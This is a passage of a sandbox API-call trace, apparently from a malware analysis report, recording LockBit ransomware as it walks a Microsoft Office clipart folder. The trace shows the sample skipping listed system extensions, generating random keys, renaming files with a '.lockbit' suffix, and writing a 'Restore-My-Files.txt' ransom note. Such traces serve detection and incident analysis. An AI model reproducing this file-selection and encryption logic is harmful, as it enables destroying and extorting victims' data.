returned -1 [0179.632] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.632] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.632] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.632] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.632] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.632] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.632] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.632] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.632] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.632] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.632] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TR00178_.WMF") returned -1 [0179.632] lstrcmpiW (lpString1="ntldr", lpString2="TR00178_.WMF") returned -1 [0179.632] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TR00178_.WMF") returned -1 [0179.632] lstrcmpiW (lpString1="bootsect.bak", lpString2="TR00178_.WMF") returned -1 [0179.632] lstrcmpiW (lpString1="autorun.inf", lpString2="TR00178_.WMF") returned -1 [0179.632] lstrcmpiW (lpString1="thumbs.db", lpString2="TR00178_.WMF") returned -1 [0179.632] lstrcmpiW (lpString1="iconcache.db", lpString2="TR00178_.WMF") returned -1 [0179.632] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.632] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00178_.WMF") returned=".WMF" [0179.632] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.632] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.633] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.633] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.633] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00178_.WMF.lockbit") returned 72 [0179.634] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00178_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0179.634] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.634] malloc (_Size=0x40068) returned 0x1ff1e60 [0179.634] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8514) returned 1 [0179.634] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.635] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0179.635] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.635] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0179.635] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0179.637] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00178_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00178_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.637] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.637] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.638] free (_Block=0x1fa2ed8) [0179.638] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00178_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.638] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.638] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.638] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefc9200, ftCreationTime.dwHighDateTime=0x1bf324c, ftLastAccessTime.dwLowDateTime=0x6d547830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xefc9200, ftLastWriteTime.dwHighDateTime=0x1bf324c, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TR00232_.WMF", cAlternateFileName="")) returned 1 [0179.638] lstrcmpiW (lpString1=".", lpString2="TR00232_.WMF") returned -1 [0179.638] lstrcmpiW (lpString1="..", lpString2="TR00232_.WMF") returned -1 [0179.638] PathFindExtensionW (pszPath="TR00232_.WMF") returned=".WMF" [0179.638] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.638] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.638] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.638] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.638] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.639] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.639] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TR00232_.WMF") returned -1 [0179.640] lstrcmpiW (lpString1="ntldr", lpString2="TR00232_.WMF") returned -1 [0179.640] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TR00232_.WMF") returned -1 [0179.640] lstrcmpiW (lpString1="bootsect.bak", lpString2="TR00232_.WMF") returned -1 [0179.640] lstrcmpiW (lpString1="autorun.inf", lpString2="TR00232_.WMF") returned -1 [0179.640] lstrcmpiW (lpString1="thumbs.db", lpString2="TR00232_.WMF") returned -1 [0179.640] lstrcmpiW (lpString1="iconcache.db", lpString2="TR00232_.WMF") returned -1 [0179.640] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.640] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00232_.WMF") returned=".WMF" [0179.640] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.640] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.640] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.641] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.641] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00232_.WMF.lockbit") returned 72 [0179.641] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00232_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00232_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0179.642] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.642] malloc (_Size=0x40068) returned 0x3d70450 [0179.642] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=27840) returned 1 [0179.642] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.643] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0179.643] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.643] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0179.643] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0179.657] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00232_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00232_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.657] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.657] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.658] free (_Block=0x1fa2ed8) [0179.659] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00232_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.659] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.659] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.659] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfba2a500, ftCreationTime.dwHighDateTime=0x1bd4b02, ftLastAccessTime.dwLowDateTime=0x6d547830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfba2a500, ftLastWriteTime.dwHighDateTime=0x1bd4b02, nFileSizeHigh=0x0, nFileSizeLow=0x7c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="TR00233_.WMF", cAlternateFileName="")) returned 1 [0179.659] lstrcmpiW (lpString1=".", lpString2="TR00233_.WMF") returned -1 [0179.659] lstrcmpiW (lpString1="..", lpString2="TR00233_.WMF") returned -1 [0179.659] PathFindExtensionW (pszPath="TR00233_.WMF") returned=".WMF" [0179.659] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.659] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.659] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.659] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.659] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.659] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.659] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.659] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.660] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.661] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.661] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.662] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.662] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TR00233_.WMF") returned -1 [0179.662] lstrcmpiW (lpString1="ntldr", lpString2="TR00233_.WMF") returned -1 [0179.662] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TR00233_.WMF") returned -1 [0179.662] lstrcmpiW (lpString1="bootsect.bak", lpString2="TR00233_.WMF") returned -1 [0179.662] lstrcmpiW (lpString1="autorun.inf", lpString2="TR00233_.WMF") returned -1 [0179.662] lstrcmpiW (lpString1="thumbs.db", lpString2="TR00233_.WMF") returned -1 [0179.662] lstrcmpiW (lpString1="iconcache.db", lpString2="TR00233_.WMF") returned -1 [0179.662] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.662] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00233_.WMF") returned=".WMF" [0179.662] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.662] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.662] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.662] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.662] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.662] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.662] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.662] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.663] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.664] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.664] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00233_.WMF.lockbit") returned 72 [0179.664] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00233_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00233_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0179.669] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.669] malloc (_Size=0x40068) returned 0x3f70048 [0179.669] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=31818) returned 1 [0179.669] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.670] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0179.670] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.670] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0179.671] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0179.680] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00233_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00233_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.680] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.680] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.682] free (_Block=0x1fa2ed8) [0179.682] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00233_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.682] wsprintfW (in: 